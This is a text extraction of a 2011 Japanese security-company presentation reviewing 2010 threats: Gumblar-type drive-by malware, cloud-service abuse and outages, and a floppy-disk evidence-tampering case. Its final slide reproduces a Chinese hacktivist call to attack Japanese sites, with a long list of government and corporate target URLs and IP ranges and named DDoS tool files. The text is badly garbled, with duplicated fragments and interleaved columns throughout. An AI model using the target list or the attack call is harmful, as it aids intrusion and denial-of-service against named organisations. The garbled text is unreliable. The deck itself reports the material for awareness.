2010年 年 のおさらいと2011年 2010年のおさらいと2011 http://dl.dropbox.com/u/7790765/shirahama20110526.pptx 株式会社ラック 株式会社 株式会社ラック ラック 最高技術責任者 最高技術責任者 株式会社ラック 西本 西本 逸郎 逸郎 [email protected] [email protected] http://www.lac.co.jp/ http://www.lac.co.jp/ Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 株式会社ラック 株式会社ラック 蛇口をひねれば 蛇口をひねれば飲 をひねれば飲み水が出る当り前を、高度情報社会でも 高度情報社会でも実現 でも実現します 実現します。 します。 株式会社ラックは1986年に設立されました。”Little eArth Corporation”という社名には、ICTの進展で 地球が相対的に小さくなっていく中で、ITを基盤に国や企業の発展を支えていこうという理念がこめられて います。 JSOC(下記参照)、サイバーセキュリティ サイバーセキュリティ研究所 JSOC サイバーセキュリティ研究所、サイバー 研究所 サイバー救急 サイバー救急センター 救急センターの配備が特徴です。 センター 商 号 株式会社ラック LAC:Little eArth Corporation Co., Ltd. 設 立 1986年(昭和61年)9月 資本金 11億5,942万6,500円 株 主 ラックホールディングス株式会社(100%) 代 表 代表取締役社長 執行役員社長 齋藤 理 売上高 4,441百万円(25期:2010年03月期) 決算期 3月末日 認定資格 経済産業省情報セキュリティ監査企業登録 情報セキュリティマネジメントシステム (ISO/IEC 27001)認証取得(JSOC) プライバシーマーク認定取得 ・本社 〒102-0093 東京都千代田区平河町 2-16-1 平河町森タワー 03-6757-0111(代表) 03-6757-0113 (営業窓口) ・名古屋オフィス 〒460-0002 名古屋市中区丸の内2-18-11 46KTビル4F ・米国ニューヨークオフィス USLAC ・韓国ソウル 子会社 CSLAC Cyber Security LAC Co.,Ltd. ・中国上海 子会社 LAC CHINA 上海楽客網絡技術有限公司 ■ JSOC (Japan Security Operation Center) JSOCは、ラックが運営する情報セキュリティに関するオペレーションセンターです。24時間365 日運営。高度な分析官とインシデント対応技術者を配置しています。2000年の九州・沖縄サミッ トの運用・監視を皮切りに、日本の各分野でのトップ企業など高レベルのセキュリティが要求さ れるお客様に、高品質なサービスを提供しています。 http://www.lac.co.jp/ [email protected] Twitter @lac_security YouTube laccotv Facebook Little.eArth.Corp 1 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li わたし にし もと いつ ろう 西本 逸郎 昭和33 昭和33年 33年 昭和59 59年 昭和 59年3月 昭和59 昭和59年 59年4月 昭和61 昭和61年 61年10月 10月 CISSP 福岡県北九州市生まれ 福岡県北九州市生まれ 熊本大学工学部土木工学科中退 情報技術開発株式会社入社 株式会社ラック 株式会社ラック入社 ラック入社 通信系ソフトウェア 通信系ソフトウェアや ソフトウェアやミドルウェアの ミドルウェアの開発に 開発に従事。 従事。1993年 1993年ドイツの ドイツのシーメンスニックスドルフ社 シーメンスニックスドルフ社と 提携し し、オープンPOS 提携 オープンPOS( POS( WindowsPOS) WindowsPOS)を世界に 世界に先駆け 先駆け開発・ 開発・実践投入。 実践投入。2000年 2000年よりセキュリ よりセキュリ ティ事業 ティ事業に 事業に身を転じ、日本最大級の 日本最大級のセキュリティセンターJSOC セキュリティセンターJSOCの JSOCの構築と 構築と立ち上げを行 げを行う。 さらなるIT さらなるIT利活用 IT利活用を 利活用を図る上での新 での新たな脅威 たな脅威への 脅威への研究 への研究や 研究や対策に 対策に邁進中。 邁進中。 情報セキュリティ 情報セキュリティ対策 セキュリティ対策を 対策をテーマに テーマに官庁、 官庁、大学、 大学、その他公益法人 その他公益法人、 他公益法人、企業、 企業、各種IT 各種ITイベント ITイベント、 イベント、 セミナーなどでの などでの講演 セミナー などでの講演、 講演、新聞・ 新聞・雑誌などへの 雑誌などへの寄稿等多数 などへの寄稿等多数 株式会社ラック 株式会社ラック 取締役 最高技術責任者 サイバー救急 サイバー救急センター 救急センター 特定非営利活動法人 日本ネットワークセキュリティ 日本ネットワークセキュリティ協会 ネットワークセキュリティ協会 理事 データベースセキュリティコンソーシアム 理事、 理事、事務局長 日本スマートフォンセキュリティフォーラム 日本スマートフォンセキュリティフォーラム 理事、 理事、事務局長 連載・ 連載・コラム 西本逸郎の 西本逸郎のセキュリティー表 セキュリティー表ウラ 産業技術大学院大学 運営諮問委員( 運営諮問委員(2009年 2009年~) 経済産業省 電子商取引等に 電子商取引等に関する法的問題検討会 する法的問題検討会 委員( 委員(2007年 2007年~) 経済産業省 サイバーセキュリティと サイバーセキュリティと経済研究会 委員( 委員(2010年 2010年~) IPA セキュリティ& セキュリティ&プログラミングキャンプ実行委員 プログラミングキャンプ実行委員( 実行委員(2007年 2007年~2009年 2009年) (財)日本情報処理開発協会 リスク管理統制対応評価検討委員 リスク管理統制対応評価検討委員 2009年度情報化月間 2009年度情報化月間 総務省情報通信2008 総務省情報通信2008年 2008年~)国際戦略局長表彰 ~)国際戦略局長表彰 セキュリティー表ウラ 検索 http://it.nikkei.co.jp/security/column/nishimoto_security.aspx ブログ どらいつ 検索 @dry2 2 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 3 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 2010年 2010年 静岡に ガンプラ 出現 30周年 4 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 5 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ① ガンブラーの ガンブラーの猛威はまだ 猛威はまだ続 はまだ続く。 2010年上半期 2010年上半期において 年上半期において特 において特にインシデント件数 インシデント件数が 件数が多かったGumblar かったGumblar およびConficker の検知件数の およびConfickerの 検知件数の推移および 推移および、 および、下半期に 下半期に検知が 検知が目 立ったウイルス 年末より ったウイルスの ウイルスの検知推移を 検知推移を示します( します(グラフ 3)。2009 )。2009年末 年末より猛威 より猛威 上半期においては およびConficker のインシ 上半期においてはGumblar においてはGumblarおよび およびConfickerの を振るっていたGumblar の検知数は 2010年11 るっていたGumblarの 検知数は減少し 減少し続けており、 けており、2010年 デントが デントが全体の 全体の7割を占めておりましたが、 めておりましたが、下半期におい 下半期におい 月にはほとんど検知 にはほとんど検知がなくなりました 検知がなくなりました。 がなくなりました。5月前後から 月前後から、 から、攻撃対象として 攻撃対象として ては11 月以降に MonkifやET Trojan( Trojan(Taterf, ては11月以降 月以降にMonkifや 日本の 日本のホストを ホストを除外するといった 除外するといった動 するといった動き も見られ、 られ、10月 にはGumblar 10月にはGumblar Gammima)、 が検知されるようになりました Gammima)、Mariposa )、Mariposaが 検知されるようになりました。 されるようになりました。 感染ホスト 感染ホストが ホストが接続する 接続するボットネット するボットネットの ボットネットの一つが停止 つが停止した 停止した ことによる影響 ことによる影響が 影響が れています。 Monkifは 日本で で 現れています。 Monkifは、ダウンローダーウイルスの ダウンローダーウイルスの一種であり 一種であり、 であり、日本 2010年 年 のうちにGumblar のうちに Gumblarの の 脅威は 脅威 は 去 ったように見 ったように 見 えますが、 えますが 、 年末に 年末 に も10月 ウイ 2010 10月ごろから大量感染 ごろから大量感染が 大量感染が話題になっていた 話題になっていたmstmp になっていたmstmpウイ かけてはMonkif やET Trojanといった かけてはMonkifや といった別のウイルスの ウイルスの検知が 検知が目立っ 目立っ Trojanといった別 ルス をダウンロードすることでも られています。 。ET ダウンロードすることでも知 することでも知られています てきています。 てきています。これらのウイルス これらのウイルスも ウイルスもGumblarと 同様に、ドライブバイダ Gumblarと同様に Trojanや TrojanやMariposaは Mariposaは2010年以前 2010年以前から 年以前から存在 から存在が 存在が知られて ウンロード攻撃 ウンロード攻撃によって 攻撃によって感染 によって感染するものであり 感染するものであり、 するものであり、依然として 依然として無防備 として無防備に 無防備にウェ いたものですが、 いたものですが、監視機器への 監視機器へのシグネチャ シグネチャ追加 追加によって によって へのシグネチャ追加 ブページを ブページを参照することによる 参照することによる脅威 することによる脅威は 脅威は継続しています 継続しています。 しています。 内部ホストによるインシデントの内訳(2010年) これらに関 11月以降の これらに関わる通信 わる通信が 通信が検出可能になり 検出可能になり、 になり、11月以降 月以降の検知 が目立ちました 目立ちました。 ちました。 6 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 7 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ② クラウドサービスの クラウドサービスの悪用 Facebook Twitter AmazonEC2 などなど 8 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 9 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ③ クラウドと クラウドとグレーゾーンの グレーゾーンの話題 どうせ、 どうせ、ブラックボックスだからね ブラックボックスだからね。 だからね。 ブラックボックスだからこそ ブラックボックスだからこそ。 だからこそ。 重要インフラ 重要インフラになり インフラになり得 になり得るのだろうか? るのだろうか? http://slashdot.jp/security/article.pl?sid=11/05/18/0820205 http://www.itmedia.co.jp/enterprise/articles/1104/22/news019.html 10 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 11 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li ④ クラウドサービスでの クラウドサービスでの事件 での事件 親ガメがこけると子ガメもこける。 どの親ガメに乗っているの? それで、それは、どこにあるの? ところで誰と契約しているの? SaaS PaaS http://internet.watch.impress.co.jp/docs/news/20110422_441671.html IaaS http://www.computerworld.jp/topics/cloud/191418.html 12 13 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li はずれ! はずれ! 14 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li さて、 さて、 この1年何が 年何が? おさらい らいオン らいオン! オン! 15 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 昨年9 昨年9月 関係者外秘 郵便割引制度をめぐる偽の証明書発行事件で、 、大阪地 検特捜部が が証拠品として 検特捜部 証拠品として押収 として押収した 押収したフロッピーディスク したフロッピーディスク(F フロッピーディスク(F D)が D)が改ざんされた疑 ざんされた疑いがあることが朝日新聞の取材で わかった。取材を受けた地検側が事件の捜査現場を指 、「誤 揮した主任検事(43)から事情を聴いたところ、「 、「誤って 書き換えてしまった」 えてしまった」と説明したという。しかし、検察関係 説明 「主任検事が 者は取材に対し「 主任検事が一部同僚に 一部同僚に『捜査の 捜査の見立 てに合 てに合うようにデータ うようにデータを データを変えた』 えた』と話した」 した」としている。検 察当局は21日以降、本格調査に乗り出す。 朝日新聞 朝刊 9月21日 朝日新聞 9月25日 Oh!! ふぁっと is this? 7月13日に改ざん? 何故わかる? こんな事件が報道された。 ツールを使えば できるわな。 ふぁっと You said? 16 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li FD改ざん事件 ざん事件が 事件が教えてくれたこと 改ざんFD ざんFD おい! おい! ドキュメントだけか ドキュメントだけか? だけか? 現在、 現在、多くのところでデジタル くのところでデジタル写真 デジタル写真や 写真やデ ジタル録音 ジタル録音が 録音が、使用されている 使用されている。 されている。 我々はすぐに、 はすぐに、証明書が 証明書が無いものはダメ いものはダメ じゃん! じゃん!と言ってしまいそうだ。 ってしまいそうだ。 メタデータを メタデータを変更することは 変更することは可能 することは可能。 可能。 費用対効果の 費用対効果の考え方はないか? はないか? 完全に 完全に証拠を 証拠を残すのか? すのか? 抑止をかけるのか 抑止をかけるのか? をかけるのか?どっちが得 どっちが得? 17 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li 関係者外秘 そう言 そう言えば、 えば、こんなことも どうして、 どうして、こんなことが? こんなことが? 何を調べるか、 べるか、 知らないのかな? らないのかな? 常識が 常識が無い? こんな報道 こんな報道も 報道も 記者がこれでは 記者がこれでは、 がこれでは、 政治家や 政治家や政府関係者の 政府関係者の 自覚と 自覚とリテラシは リテラシは 大丈夫か 大丈夫か? 朝日新聞 18 Copyr Copyright ight © Littttle le eAr eArth thCorporat Corporation ionCo Co.,.,Ltd Ltd.. ©2011 2011 Li そう言 そう言えば918 えば918 http://www.kantei.go.jp首相官邸 JUDAL http://www12.u-page.so-net.ne.jp/rk9/judal/ 青木光惠 http://www.gainax.co.jp/hills/aoki/ 210.128.000.000- 210.175.255.255 [日本} 总理大臣居所 http://www.kantei.go.jp/index-e.html 日本各市县政府机构 大阪县政府 安倍吉俊 http://www.people.or.jp/~ab/index.html http://www.jinji.admix.go.jp人事院 获原一至 http://www01.vaio.ne.jp/BASTA/index.html Japan Federation of Economic 202.11.0.1 - 202.11.255.255 210.081.000.000- 210.081.031.255 [日本][] 坂田晴子 http://www2u.biglobe.ne.jp/~ysakata/ 总理办公室 http://www.sorifu.go.jp/english/index-e.html Aichi http://www.pref.aichi.jp/index-e.html http://www.pref.osaka.jp/ 犬木加奈子 http://www.i-dream.net/~inuki/ 中国の赤い客連盟 もとの核心の9.12-9.18組織が発表して公告が壁の不完全で平 http://www.clb.admix.go.jp内阁法制 Organizations (Keidanren) 202.12.8.1 - 202.12.15.255 210.088.000.000- 210.088.191.255 [日本][] 北神谅 http://swat.pos.to/ 森川久美 http://www1.linkclub.or.jp/~mya/ 安全部 http://www.jda.go.jp/index_e.html Aomori http://www.pref.aomori.jp/home-e.html 大阪市政府 坦な瀘溝の橋を廃棄してまた歴史の砲火の中でむせび泣く歳月の経過が祖国の 碧也绯红 http://www03.u-page.so-net.ne.jp/qc4/pink-a/ http://www.sorifu.go.jp总理府 山田南平 http://nanpei.net/ 210.188.000.000 -210.191.255.255 [日本][] http://www.keidanren.or.jp/ 202.13.0.1 - 202.13.254.255 经济部 http://www.epa.go.jp/ Chiba http://www.pref.chiba.jp/index-e.html http://www.city.osaka.jp/ 冰粟优 http://www.diana.dti.ne.jp/~higuri/ 上田美和 http://www.yomogi.sakura.ne.jp/~peach/ ネット界の再度の鳴り響く警鐘が新世代の私達とする時にあの屈辱の歴史の今日 http://www.jftc.admix.go.jp公正取引委员 210.196.000.000 -210.199.255.255 [日本][] Japan Association of Corporate 202.15.0.1 - 202.15.255.255 潮见知佳 http://www.katch.ne.jp/~shiomi/ 上田信舟 http://www.geocities.co.jp/Playtown/3526/ 科技部 http://www.sta.go.jp/index-e.html Ehime http://www.pref.ehime.jp/index-e.htm に拭いていくことができないことを攻撃します。77と918精神を受けてその通りにしま 210.224.000.000- 210.239.255.255 [日本][] http://www.npa.go.jp警察厅 成岛百合 http://www.ne.jp/asahi/yuri/narushima/ Executives (KEIZAI DOYUKAI) 202.16.0.1 - 202.19.255.255 神田森莉 http://www2u.biglobe.ne.jp/~kaba3hijiri_index.html 环境部 http://mx.eic.or.jp/eanet/index-e.html Fukui http://www.pref.fukui.jp/english/index.html 信息网站: 池田惠 http://www.eva.hi-ho.ne.jp/ikeda-k/ す。 私達の方式を使います。私達の思想を使います。断固としてすべての侵略者 210.248.000.000- 211.007.255.255 [日本][] 圣悠纪 http://www.linkclub.or.jp/~mya/ http://www.kouchoi.go.jp公害等调整委员 http://www.doyukai.or.jp/Eindex.htm 202.20.90.1 - 202.20.90.255 池泽理美 http://home.catv.ne.jp/dd/ikezawa/ 发展部 http://www.oda.go.jp/ / Fukushima http://www.pref.fukushima.jp/index_e.html http://www.stardust.co.jp/ 日本>女演员>松雪泰子 石川优吾 http://www.you-go.net/ 211.008.000.000- 211.019.255.255 [日本][] に反撃します。 祖国のネットワークセキュリティのために最後まで奮戦して日本が http://www.kunaicho.go.jp宫内厅 The Japan Chamber of Commerce & Industry 202.20.110.1 - 202.20.110.255 赤石路代 http://www.14.u-page.so-net.ne.jp/xb3/michiyo/ 士贵智志 http://www.wrenchstudio.gr.jp 土地部 http://www.nla.go.jp/welcome-e.html Hiroshima http://www.hiroshima-cdas.or.jp/pref/index-e.html http://en-f.tezuka.co.jp/ 铁臂阿童木 010.192.000.000- 010.192.255.255 [日本][] 歴史の文化にねじ曲がることに反対します。 赤松健 http://www.ailove.net/ http://www.somucho.go.jp总务厅 手冢治虫 http://www.tezuka.co.jp/ http://www.jcci.or.jp/home-e.html 202.20.123.1 131.107.003.000 -131.107.003.255 [][Microsoft日本公司] 贸易部 http://www.jftc.go.jp/e-page/f_home.htm Hokkaido http://www.pref.hokkaido.jp/index-e.html http://www.tokyometro.go.jp/ 东京地铁- 202.20.124.255 船户明里 http://www.ne.jp/asahi/orange/lamp/index2.htm 树夏实 http://www.ny.airnet.ne.jp/itsuki/ 日本の畜生のために私達のこちら(側)の静かで落ち着いた国土の上で残す様々な http://www.stat.go.jp总务厅 统计 Central Union of Agricultural Co-operatives of Japan (JA-ZENCHU) 202.21.112.1 大枪苇人 http://www.inkpot.org/ 165.076.000.000- 165.076.255.255 [日本][] 水城雪可奈 http://www.page.sannet.ne.jp/setona/index.html 外务省 http://www.mofa.go.jp/ / Hukushima http://www.pref.fukushima.jp/index_e.html http://www.tcvb.or.jp/ 东京>本地指南 - 202.21.117.255 http://www.stat.go.jp/1.htm[英] 道原香津美 http://member.nifty.ne.jp/michihara/index.htm 司淳罪悪。1つのネットの愛好者として、私達は私達の武器を取るべきです。 http://www7.big.or.jp/~abura/ http://www.rim.or.jp/ci/ja/ejahome.html 202.21.150.1 - 202.21.153.255 165.076.248.000 -165.076.248.255 [日本][大阪] 全日空航空公司 财政部 http://www.mof.go.jp/english/index.htm Hyogo http://web.pref.hyogo.jp/index-e.htm http://svc.ana.co.jp/ 东城和实 http://www.linkclub.or.jp/~miyacom/ 寺田克也 http://www.t3.rim.or.jp/~tera/ 私達の五星紅旗を守ります。世間の人に中国を銘記させることは永遠に屈服するこ http://www.hda.go.jp北海道开发厅[日 Federation of Bankers Associations of Japan (ZENGINKYO) 202.22.64.1 - 202.22.127.255 202.000.065.000 -202.000.066.255 [日本][] 都筑和美 http://www.monbu.go.jp/emindex.html http://www.ifnet.or.jp/~byunbyun/ 松本零士 http://leiji-matsumoto.ne.jp/ 教育部 Ibaraki http://www.pref.ibaraki.jp/index-e.html http://www.jal.co.jp/ 日本航空公司 http://www.jda.go.jp防卫厅 多田由美 http://www.yo.rim.or.jp/~fudge/ 202.000.072.000 -202.000.073.255 [日本][] とはありえない http://www.zenginkyo.or.jp/en/index.htm 202.23.0.1 松本泉 http://www.comic-on.co.jp/ 卫生部 http://www.mhw.go.jp/english/index.html Ishikawa http://www.pref.ishikawa.jp/index_e.htm http://www.nintendo.co.jp/ 任天堂 - 202.26.255.255 峰仓和也 http://members5.cool.ne.jp/~nitroxxx/ 大田早纪 http://homepage2.nifty.com/uki/ http://www.epa.go.jp经济企画厅 202.000.076.000 -202.000.076.255 [日本][] The Federation of Electric Power Companies 202.32.0.1 - 202.35.255.255 富泽仁司 http://www.jah.ne.jp/~lucky/fss.html 农林牧副渔部 http://www.maff.go.jp/eindex.html Iwate http://www.office.pref.iwate.jp/index_e.html http://www.usj.co.jp/ 日本环球影城 藤玉树 http://poppy.roo.ne.jp/~bud/ 202.000.093.000- 202.000.093.255 [日本][] http://www.sta.go.jp科学技术厅 http://www.fepc.or.jp/index_e.html 202.48.0.1 - 202.48.255.255 冈崎武士 http://www.t3.rim.or.jp/~happy/ 藤原カムィ http://www.studio2b.co.jp/ 国贸部 http://www.miti.go.jp/index-e.html Kagoshima http://www.pref.kagoshima.jp/pref/english/index.html http://www.apu.ac.jp/ 亚洲太平洋大学 202.006.098.000 -202.006.098.255 [日本][] 冈田芽武 Whaling http://www.mcb-jp.com/ http://www.oda.go.jp冲绳开发厅[日 することがあるのです。台湾独立のサイトを支持して 藤子F不二雄 http://dora-world.com/top.html Japan Association 202.139.192.1 - 202.139.207.255 交通部 Kanagawa http://www.pref.kanagawa.jp/index-e.html http://china.kyodo.co.jp/ 共同网 冈野玲子 http://www.motnet.go.jp/index.htm http:///www.najanaja.co.jp/ 202.011.000.000 -202.011.255.255 [日本][] 天王寺 http://www.lifox.co.jp/ http://www.nla.go.jp国土厅 大規模な抵抗を行います日本の畜生に中国人がもう沈みないことを知っていさせま http://www.jp-whaling-assn.com/english/index.htm 202.140.0.1东京迪士尼渡假区 - 202.140.31.255 冈野史佳 http://www.mpt.go.jp/index-e.html http://www.planet-f/com/ 田村由美 http://www02.so-net.ne.jp/~tamura-y/ 邮电部 202.012.008.000 -202.012.015.255 [日本][] Kochi http://www.pref.kochi.jp/~kokusai/index.html http://www.tokyodisneyresort.co.jp/ http://www.fsa.go.jp金融监督 高岛奈月 http://www.h5.dion.ne.jp/~east_pro/ す。中国は今日にそびえ立って、日本の様々な行為に直面して私達が非常に遺憾 The Japanese Institute of Certified Public Accountants 202.013.000.000 202.176.0.32 - 202.176.3.255 田中机械 http://www.aa.aeonnet.ne.jp/~child-planet/ -202.013.127.255 [日本][] 劳动部 http://www.mol.go.jp/english/index.htm Kyoto http://www.pref.kyoto.jp/normal/index_e.html http://www.fujitv.co.jp/ 富士电视台 高口里纯 http://www.takaguchi.net/top.html 田中久仁彦 http://www3.tky.3web.ne.jp/~r4mt/menu/framepage2.htm http://www.moj.go.jp法务省 に思って、中国人の私達として、いかなるひとつの気骨がある中国人として、私達は http://www.jicpa.or.jp/eng/index.html 202.208.0.1 - 202.255.255.255 202.013.128.000 -202.013.191.255 [日本][] 高桥美由纪http://www.moc.go.jp/eng/eng/index.htm http://miyuki.iii.co.jp/ 建设部 望月玲子 http://www.reiko-mochizuki.com/index2.html Mie http://www.pref.mie.jp/ENGLISH http://www.odakyu-co.com/ / 小田急电铁股份有限公司 http://www.mofa.go.jp外务省 すべて更に沈黙するべきでなくて、私達は私たち自身の方式を使って、日本に1つ 高桥明Japan http://www13.big.or.jp/~matrix/ The Magazine Publishers Association 203.136.0.1 - 203.141.255.255 唯登诗树 http://yui.mac-time.ne.jp/ 202.013.192.000- 202.013.223.255 [日本][] 内务部 http://www.mha.go.jp/eng/index.htm Miyazaki http://www.pref.miyazaki.jp/english/index.htm http://www.j-league.or.jp/ 日本职业足球联赛 高桥努 http://www.din.or.jp/7Etao/ http://www.mof.go.jp大藏省 五十岚优美子 http://www.candycandy.net/new_candy/index.html のよく響く警鐘をたたいて鳴らして、中国人民は軟弱が騙しても良くありません! http://www.j-magazine.or.jp/FIPP/FIPPE/mokuji.html 203.178.0.1 202.013.224.000 -202.013.239.255 [日本][] 高桥由美 http://home.att.ne.jp/sky/thewell/main.html Nagano http://www.pref.nagano.jp/english/index_e.htm http://www.ghibli-museum.jp/ 美术馆- 203.183.255.255 武井宏之 http://www.harnet.co.jp/ http://www.nta.go.jp国税厅[日 ここでもとの中国の赤い客連盟(http://www.honker.net) 核心の呼びかけの広大な 202.013.240.000 -202.013.247.255 [日本][] Japan Publishers Association 203.216.0.1 - 203.216.255.255 高屋奈月 Bookhttp://www.05.u-page.so-net.ne.jp/wc4/nozo/ 武林武士 http://www13.u-page.so-net.ne.jp/bf6/kotama/index.html Nagasaki http://www.us1.nagasaki-noc.or.jp/~nagasaki/index_e.html http://www.seaparadise.co.jp/ 日本八景岛乐园 宫板香帆 http://www5a.biglobe.ne.jp/~binetsu/ 202.013.248.000 -202.013.251.255 [日本][] http://www.monbu.go.jp文部省 国を愛する青年、広大なコンピュータの愛好者、広大なハッカーの技術者、9月18 物领冬实 http://www.remus.dti.ne.jp/~suko http://www.jbpa.or.jp/default-e.htm 210.7.128.1神奈川县观光协会 - 210.7.255.255 Nara http://www.pref.nara.jp/index-e.html http://www.kanagawa-kankou.or.jp/ 古张乃莉 http://www.h-angels.net/ 喜多尚江 http://www02.u-page.so-net.ne.jp/qc4/naoe/ 202.013.252.000- 202.013.253.255 [日本][] http://www.monbu.go.jp/emindex.html[英] 文化厅[日] Japan Manufacturers Association 210.81.0.1 - 210.81.31.255 和田尚子 Pharmaceutical http://www.linkclub.or.jp/~naoko-w/ 日に日本に対してネットを始めて戦って 喜国雅彦 http://plaza22.mbn.or.jp/~kunikikuni/index.f.html Niigata http://www.pref.niigata.jp/en/index.html http://www.tokyotower.co.jp 东京塔官方网站 202.013.254.000 -202.013.254.255 [日本][] http://www.maff.go.jp农林水产省 Ministr 河原和音 http://www5b.biglobe.ne.jp/~kazune/ http://www.jpma.or.jp/english/index-e.html 210.88.0.1 - 210.88.191.255 小浪诏子 http://conami.cc/ Oita http://www.coara.or.jp/OITAPref/OITA_HOME_EN.html http://www.tnc.co.jp/ 日本>静冈>电视台 202.015.000.000 -202.015.255.255 [日本][] 后藤星 http://www3.justnet.ne.jp/~ruby/ 小林博美 http://www.eps4.comlink.ne.jp/~hiromi/ http://www.miti.go.jp通商产业省 Ministr The Steel Institute of Japan 210.128.0.1 - 210.191.255.255 后藤直Iron and http://www.st.sakura.ne.jp/~galaxy/ 202.016.000.000 -202.019.255.255 [日本][] 小手川瑜亚 http://www.bekkoame.ne.jp/ro/gj13041/ Okinawa http://www.pref.okinawa.jp/index.html http://www.junichi-inamoto.jp/ 稻本润一 http://www.hkd.miti.go.jp>MITI Hokkaido[ 皇名月 http://www.roy.hi-ho.ne.jp/nasuga/ http://www.isij.or.jp/e_index.htm 210.196.0.1 を主として(その時目標と方式を発表する 小鹰和麻 http://www.dinor.jp/~k2c/ 202.020.090.000 -202.020.090.255 [日本][] Osaka http://www.pref.osaka.jp/osaka-pref/indexe.html http://www.tv-tower.co.jp/ 札幌电视塔- 210.199.255.255 木薰理 http://www.netpronejp/~himeki/ http://www.tohoku.miti.go.jp 小泽真理 http://kata.sakura.ne.jp/ Japan Hotel Association 210.224.0.1 - 210.239.255.255 ことができ(ありえ)ます)!その時また組織の私達の安全な技術のグループができて 202.020.110.000- 202.020.110.255 [日本][] 极乐院樱子 http://www.linkclub.or.jp/~saurako/ Saga http://www.pref.saga.jp/eibun/esagaken.html 筱原正美 http://www.geocities.co.jp/AnimeComic-Pen/2441/index.html http://www.kantou.miti.go.jp http://www.j-hotel.or.jp/english/index.html 210.248.0.1 - 210.255.255.255 见田龙介&御祗岛千明 http://club.pep.ne.jp/~mitaogi/ 202.020.123.000 202.020.123.255 [日本][] 须藤真澄 http://www.catnet.ne.jp/masumi/ Saitama http://www.pref.saitama.jp/core_e.html 日本のそれぞれ大きいウェブサイトに対して私達の旗幟に掛かって、 江口寿史 http://www.kotobuki-studio.com/ http://www.chubu.miti.go.jp> 绪方刚志 http://www.pagesannet.ne.jp/bonoto/ 202.020.124.000 -202.020.124.255 [日本][] Japanese Trade Union Confederation (RENGO) 211.0.0.1-210.19.255255 Shiga http://www.pref.shiga.jp/index-e.html 介错 http://www.toshima.ne.jp/~kaishaku/ 雁川せゅ http://www3.justnet.ne.jp/~rackandpinion/ して、日本に一回 http://www.miti-kansai.go.jp 202.021.112.000 -202.021.127.255 [日本][] http://www.jtuc-rengo.or.jp/english/index.html 218.222.0.1 - 218.222.255.255 今泉伸二 http://www06.u-page.so-net.ne.jp/yc4/nachu/ 野间美由纪 http://www.studio-rose.com/ Shimane http://www.pref.shimane.jp/index_e.html 202.021.150.000 -202.021.151.255 [日本][] の重責の打撃に来ることをあげます. 今回の行動に参加する友達が着くことを願っ http://www.chugoku.miti.go.jp 井上纪良 http://www.studio-angels.co.jp/ National Confederation of Trade Unions (Zenroren) 219.1.0.1 - 219.10.255.255 叶精作 http://www.mac-time.ne.jp/kano/ Shizuoka http://www.pref.shizuoka.jp/indexE.html 井上三太 http://www.santa.co.jp/ 202.021.152.000 -202.021.153.255 伊万里寿美子 http://www.ingjapan.ne.jp/imari/ て下さい [日本][] 群の5209614をプラスします 基礎の成員は群の共有に武器を熟知して http://www.shikoku.miti.go.jp http://www.iijnet.or.jp/c-pro/union/aa_e/index_e.html 井上雄彦 http://www.itplanning.co.jp/ 樱濑虎 http://ohse-kohime.cool.ne.jp/ Tokyo http://www.metro.tokyo.jp/ 202.022.064.000 -202.022.127.255 [日本][] そしてDF-5戦術の核ミサイルをダウンロードしてもらいます.exe 1.1MB ,DDOS強 http://www.miti-kyushu.go.jp 九音摩绪 http://www.diana.dti.ne.jp/~gekkoh/ 219.116.124.16 影木荣贵 http://www.geocities.co.jp/AnimeComic/1990/ Tokushima http://www.pref.tokushima.jp/index_e.html 202.023.000.000 -202.023.255.255 [日本][] 橘水树&樱林子 http://i-f.pos.to/STiCCA/ い力killertop版.EXE 28.5KB ,阿のラテンUDPは器V2.1.exe を攻撃します http://www.enecho.go.jp资源能源厅 御茶渍海苔 http://www5a.biglobe.ne.jp/~ochazuke/index.html 219.1.0.0-219.127.255.255 202.024.000.000 -202.025.255.255 [日本][] 葵二叶&红三叶 http://www.twincastle.com/ Toyama http://www.pref.toyama.jp/index-e.html 垣野内成美 http://www.aprildd.co.jp/~kakinouchi/ 1.3MB ,このツールで時間は統一的にようやく最大の技と力を発揮することができ http://www.jpo-miti.go.jp特许厅 立花日 http://wsp.jpweb.sh/ 202.026.000.000- 202.026.255.255 [日本][] 原哲夫 http://www.haratetsuo.com/ Wakayama http://www.wakayama.go.jp/index_e.html 立野真琴 http://www.netlaputa.ne.jp/~tenhou/ http://www.motnet.go.jp运输省 なければならなくて、核心はグループの成員に侵入してその他の方法を使って侵 月森雅子 http://kobe.cool.ne.jp/tukimori/ 219.160.0.0--219.215.255.255 小日本的网站 